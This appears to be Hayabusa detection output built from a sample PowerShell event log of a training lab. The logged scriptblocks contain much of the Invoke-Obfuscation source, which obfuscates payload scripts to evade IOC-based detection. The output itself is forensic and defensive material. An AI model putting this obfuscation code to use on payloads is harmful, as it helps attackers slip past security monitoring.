Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:21.320 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:31.954 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,cd C:\Users\student\Desktop\Invoke-Obfuscation-master\,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:31.956 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:38.671 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,Invoke-Obfuscation,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:38.711 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:38.715 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:38.716 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:38.776 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.198 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,Import-Module .\Invoke-Obfuscation.psd1,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.202 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# 
This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Module manifest for module 'Invoke-Obfuscation' # # Generated by: Daniel Bohannon (@danielhbohannon) # # Generated on: 2017-01-19 # @{ # Version number of this module. ModuleVersion = '1.1' # ID used to uniquely identify this module GUID = 'd0a9150d-b6a4-4b17-a325-e3a24fed0aa9' # Author of this module Author = 'Daniel Bohannon (@danielhbohannon)' # Copyright statement for this module Copyright = 'Apache License, Version 2.0' # Description of the functionality provided by this module Description = 'PowerShell module file for importing all required modules for the Invoke-Obfuscation framework.' 
# Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' # Minimum version of the Windows PowerShell host required by this module PowerShellHostVersion = '2.0' # Script files (.ps1) that are run in the caller's environment prior to importing this module ScriptsToProcess = @('Out-ObfuscatedTokenCommand.ps1','Out-ObfuscatedStringCommand.ps1','Out-EncodedAsciiCommand.ps1','Out-EncodedHexCommand.ps1','Out-EncodedOctalCommand.ps1','Out-EncodedBinaryCommand.ps1','Out-SecureStringCommand.ps1','Out-EncodedBXORCommand.ps1','Out-EncodedSpecialCharOnlyCommand.ps1','Out-EncodedWhitespaceCommand.ps1','Out-PowerShellLauncher.ps1','Invoke-Obfuscation.ps1') # Functions to export from this module FunctionsToExport = '*' # HelpInfo URI of this module # HelpInfoURI = '' }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedTokenCommand { <# .SYNOPSIS Master function that orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script. 
Invoke-Obfuscation Function: Out-ObfuscatedTokenCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER TokenTypeToObfuscate (Optional) Specifies the token type to obfuscate ('Command', 'CommandArgument', 'Comment', 'Member', 'String', 'Type', 'Variable', 'RandomWhitespace'). If not defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given TokenTypeToObfuscate. If not defined then Out-ObfuscatedTokenCommand will automatically perform obfuscation function at the highest available obfuscation level. Each token has different available obfuscation levels: 'Argument' 1-4 'Command' 1-3 'Comment' 1 'Member' 1-4 'String' 1-2 'Type' 1-2 'Variable' 1 'Whitespace' 1 'All' 1 .EXAMPLE C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} .( ""{0}{2}{1}"" -f'Write','t','-Hos' ) ( 'Hell' + 'o ' +'Wor'+ 'ld!' 
) -ForegroundColor ( ""{1}{0}"" -f 'een','Gr') ; .( ""{1}{2}{0}""-f'ost','Writ','e-H' ) ( 'O' + 'bfusca'+ 't' + 'ion Rocks' + '!') -ForegroundColor ( ""{1}{0}""-f'een','Gr' ) .NOTES Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('Member', 'Command', 'CommandArgument', 'String', 'Variable', 'Type', 'RandomWhitespace', 'Comment')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [String] $TokenTypeToObfuscate, [Parameter(Position = 2)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = 10 # Default to highest obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # If $TokenTypeToObfuscate was not defined then we will automate randomly calling all available obfuscation functions in Out-ObfuscatedTokenCommand. 
If($TokenTypeToObfuscate.Length -eq 0) { # All available obfuscation token types (minus 'String') currently supported in Out-ObfuscatedTokenCommand. # 'Comment' and 'String' will be manually added first and second respectively for reasons defined below. # 'RandomWhitespace' will be manually added last for reasons defined below. $ObfuscationChoices = @() $ObfuscationChoices += 'Member' $ObfuscationChoices += 'Command' $ObfuscationChoices += 'CommandArgument' $ObfuscationChoices += 'Variable' $ObfuscationChoices += 'Type' # Create new array with 'String' plus all obfuscation types above in random order. $ObfuscationTypeOrder = @() # Run 'Comment' first since it will be the least number of tokens to iterate through, and comments may be introduced as obfuscation technique in future revisions. $ObfuscationTypeOrder += 'Comment' # Run 'String' second since otherwise we will have unnecessary command bloat since other obfuscation functions create additional strings. $ObfuscationTypeOrder += 'String' $ObfuscationTypeOrder += (Get-Random -Input $ObfuscationChoices -Count $ObfuscationChoices.Count) # Apply each randomly-ordered $ObfuscationType from above step. ForEach($ObfuscationType in $ObfuscationTypeOrder) { $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock]::Create($ScriptString)) $ObfuscationType $ObfuscationLevel } Return $ScriptString } # Parse out and obfuscate tokens (in reverse to make indexes simpler for adding in obfuscated tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) # Handle fringe case of retrieving count of all tokens used when applying random whitespace. 
$TokenCount = ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenTypeToObfuscate}).Count $TokensForInsertingWhitespace = @('Operator','GroupStart','GroupEnd','StatementSeparator') # Script-wide variable ($Script:TypeTokenScriptStringGrowth) to speed up Type token obfuscation by avoiding having to re-tokenize ScriptString for every token. # This is because we are appending variable instantiation at the beginning of each iteration of ScriptString. # Additional script-wide variable ($Script:TypeTokenVariableArray) allows each unique Type token to only be set once per command/script for efficiency and to create less items to create indicators off of. $Script:TypeTokenScriptStringGrowth = 0 $Script:TypeTokenVariableArray = @() If($TokenTypeToObfuscate -eq 'RandomWhitespace') { # If $TokenTypeToObfuscate='RandomWhitespace' then calculate $TokenCount for output by adding token count for all tokens in $TokensForInsertingWhitespace. $TokenCount = 0 ForEach($TokenForInsertingWhitespace in $TokensForInsertingWhitespace) { $TokenCount += ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenForInsertingWhitespace}).Count } } # Handle fringe case of outputting verbiage consistent with options presented in Invoke-Obfuscation. If($TokenCount -gt 0) { # To be consistent with verbiage in Invoke-Obfuscation we will print Argument/Whitespace instead of CommandArgument/RandomWhitespace. $TokenTypeToObfuscateToPrint = $TokenTypeToObfuscate If($TokenTypeToObfuscateToPrint -eq 'CommandArgument') {$TokenTypeToObfuscateToPrint = 'Argument'} If($TokenTypeToObfuscateToPrint -eq 'RandomWhitespace') {$TokenTypeToObfuscateToPrint = 'Whitespace'} If($TokenCount -gt 1) {$Plural = 's'} Else {$Plural = ''} # Output verbiage concerning which $TokenType is currently being obfuscated and how many tokens of each type are left to obfuscate. 
# This becomes more important when obfuscated large scripts where obfuscation can take several minutes due to all of the randomization steps. Write-Host ""`n[*] Obfuscating $($TokenCount)"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" token$Plural."" } # Variables for outputting status of token processing for large token counts when obfuscating large scripts. $Counter = $TokenCount $OutputCount = 0 $IterationsToOutputOn = 100 $DifferenceForEvenOutput = $TokenCount % $IterationsToOutputOn For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Extra output for large scripts with several thousands tokens (like Invoke-Mimikatz). If(($TokenCount -gt $IterationsToOutputOn*2) -AND ((($TokenCount-$Counter)-($OutputCount*$IterationsToOutputOn)) -eq ($IterationsToOutputOn+$DifferenceForEvenOutput))) { $OutputCount++ $ExtraWhitespace = ' '*(([String]($TokenCount)).Length-([String]$Counter).Length) If($Counter -gt 0) { Write-Host ""[*] $ExtraWhitespace$Counter"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" tokens remaining to obfuscate."" } } $ObfuscatedToken = """" If(($Token.Type -eq 'String') -AND ($TokenTypeToObfuscate.ToLower() -eq 'string')) { $Counter-- # If String $Token immediately follows a period (and does not begin $ScriptString) then do not obfuscate as a String. # In this scenario $Token is originally a Member token that has quotes added to it. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If(($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) { Continue } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock. # When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock. # Source: https://technet.microsoft.com/en-us/library/hh847743.aspx $ParameterValidationAttributesToTreatStringAsScriptblock = @() $ParameterValidationAttributesToTreatStringAsScriptblock += 'alias' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty' $ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage' $ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact' $ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel 
value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Member') -AND ($TokenTypeToObfuscate.ToLower() -eq 'member')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens. # Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx $MemberTokensToOnlyRandomCase = @() $MemberTokensToOnlyRandomCase += 'mandatory' $MemberTokensToOnlyRandomCase += 'position' $MemberTokensToOnlyRandomCase += 'parametersetname' $MemberTokensToOnlyRandomCase += 'valuefrompipeline' $MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname' $MemberTokensToOnlyRandomCase += 'valuefromremainingarguments' $MemberTokensToOnlyRandomCase += 'helpmessage' $MemberTokensToOnlyRandomCase += 'alias' # Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx $MemberTokensToOnlyRandomCase += 'confirmimpact' $MemberTokensToOnlyRandomCase += 'defaultparametersetname' $MemberTokensToOnlyRandomCase += 'helpuri' $MemberTokensToOnlyRandomCase += 'supportspaging' $MemberTokensToOnlyRandomCase += 'supportsshouldprocess' $MemberTokensToOnlyRandomCase += 'positionalbinding' $MemberTokensToOnlyRandomCase += 'ignorecase' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1} 4 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2} default 
{Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'CommandArgument') -AND ($TokenTypeToObfuscate.ToLower() -eq 'commandargument')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} 4 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedTokenCommand { <# .SYNOPSIS Master function that orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedTokenCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER TokenTypeToObfuscate (Optional) Specifies the token type to obfuscate ('Command', 'CommandArgument', 'Comment', 'Member', 'String', 'Type', 'Variable', 'RandomWhitespace'). If not defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given TokenTypeToObfuscate. If not defined then Out-ObfuscatedTokenCommand will automatically perform obfuscation function at the highest available obfuscation level. Each token has different available obfuscation levels: 'Argument' 1-4 'Command' 1-3 'Comment' 1 'Member' 1-4 'String' 1-2 'Type' 1-2 'Variable' 1 'Whitespace' 1 'All' 1 .EXAMPLE C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' 
-ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} .( ""{0}{2}{1}"" -f'Write','t','-Hos' ) ( 'Hell' + 'o ' +'Wor'+ 'ld!' ) -ForegroundColor ( ""{1}{0}"" -f 'een','Gr') ; .( ""{1}{2}{0}""-f'ost','Writ','e-H' ) ( 'O' + 'bfusca'+ 't' + 'ion Rocks' + '!') -ForegroundColor ( ""{1}{0}""-f'een','Gr' ) .NOTES Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('Member', 'Command', 'CommandArgument', 'String', 'Variable', 'Type', 'RandomWhitespace', 'Comment')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [String] $TokenTypeToObfuscate, [Parameter(Position = 2)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = 10 # Default to highest obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. 
If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # If $TokenTypeToObfuscate was not defined then we will automate randomly calling all available obfuscation functions in Out-ObfuscatedTokenCommand. If($TokenTypeToObfuscate.Length -eq 0) { # All available obfuscation token types (minus 'String') currently supported in Out-ObfuscatedTokenCommand. # 'Comment' and 'String' will be manually added first and second respectively for reasons defined below. # 'RandomWhitespace' will be manually added last for reasons defined below. $ObfuscationChoices = @() $ObfuscationChoices += 'Member' $ObfuscationChoices += 'Command' $ObfuscationChoices += 'CommandArgument' $ObfuscationChoices += 'Variable' $ObfuscationChoices += 'Type' # Create new array with 'String' plus all obfuscation types above in random order. $ObfuscationTypeOrder = @() # Run 'Comment' first since it will be the least number of tokens to iterate through, and comments may be introduced as obfuscation technique in future revisions. $ObfuscationTypeOrder += 'Comment' # Run 'String' second since otherwise we will have unnecessary command bloat since other obfuscation functions create additional strings. $ObfuscationTypeOrder += 'String' $ObfuscationTypeOrder += (Get-Random -Input $ObfuscationChoices -Count $ObfuscationChoices.Count) # Apply each randomly-ordered $ObfuscationType from above step. ForEach($ObfuscationType in $ObfuscationTypeOrder) { $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock]::Create($ScriptString)) $ObfuscationType $ObfuscationLevel } Return $ScriptString } # Parse out and obfuscate tokens (in reverse to make indexes simpler for adding in obfuscated tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) # Handle fringe case of retrieving count of all tokens used when applying random whitespace. 
$TokenCount = ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenTypeToObfuscate}).Count $TokensForInsertingWhitespace = @('Operator','GroupStart','GroupEnd','StatementSeparator') # Script-wide variable ($Script:TypeTokenScriptStringGrowth) to speed up Type token obfuscation by avoiding having to re-tokenize ScriptString for every token. # This is because we are appending variable instantiation at the beginning of each iteration of ScriptString. # Additional script-wide variable ($Script:TypeTokenVariableArray) allows each unique Type token to only be set once per command/script for efficiency and to create less items to create indicators off of. $Script:TypeTokenScriptStringGrowth = 0 $Script:TypeTokenVariableArray = @() If($TokenTypeToObfuscate -eq 'RandomWhitespace') { # If $TokenTypeToObfuscate='RandomWhitespace' then calculate $TokenCount for output by adding token count for all tokens in $TokensForInsertingWhitespace. $TokenCount = 0 ForEach($TokenForInsertingWhitespace in $TokensForInsertingWhitespace) { $TokenCount += ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenForInsertingWhitespace}).Count } } # Handle fringe case of outputting verbiage consistent with options presented in Invoke-Obfuscation. If($TokenCount -gt 0) { # To be consistent with verbiage in Invoke-Obfuscation we will print Argument/Whitespace instead of CommandArgument/RandomWhitespace. $TokenTypeToObfuscateToPrint = $TokenTypeToObfuscate If($TokenTypeToObfuscateToPrint -eq 'CommandArgument') {$TokenTypeToObfuscateToPrint = 'Argument'} If($TokenTypeToObfuscateToPrint -eq 'RandomWhitespace') {$TokenTypeToObfuscateToPrint = 'Whitespace'} If($TokenCount -gt 1) {$Plural = 's'} Else {$Plural = ''} # Output verbiage concerning which $TokenType is currently being obfuscated and how many tokens of each type are left to obfuscate. 
# This becomes more important when obfuscated large scripts where obfuscation can take several minutes due to all of the randomization steps. Write-Host ""`n[*] Obfuscating $($TokenCount)"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" token$Plural."" } # Variables for outputting status of token processing for large token counts when obfuscating large scripts. $Counter = $TokenCount $OutputCount = 0 $IterationsToOutputOn = 100 $DifferenceForEvenOutput = $TokenCount % $IterationsToOutputOn For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Extra output for large scripts with several thousands tokens (like Invoke-Mimikatz). If(($TokenCount -gt $IterationsToOutputOn*2) -AND ((($TokenCount-$Counter)-($OutputCount*$IterationsToOutputOn)) -eq ($IterationsToOutputOn+$DifferenceForEvenOutput))) { $OutputCount++ $ExtraWhitespace = ' '*(([String]($TokenCount)).Length-([String]$Counter).Length) If($Counter -gt 0) { Write-Host ""[*] $ExtraWhitespace$Counter"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" tokens remaining to obfuscate."" } } $ObfuscatedToken = """" If(($Token.Type -eq 'String') -AND ($TokenTypeToObfuscate.ToLower() -eq 'string')) { $Counter-- # If String $Token immediately follows a period (and does not begin $ScriptString) then do not obfuscate as a String. # In this scenario $Token is originally a Member token that has quotes added to it. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If(($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) { Continue } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock. # When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock. # Source: https://technet.microsoft.com/en-us/library/hh847743.aspx $ParameterValidationAttributesToTreatStringAsScriptblock = @() $ParameterValidationAttributesToTreatStringAsScriptblock += 'alias' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty' $ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage' $ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact' $ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel 
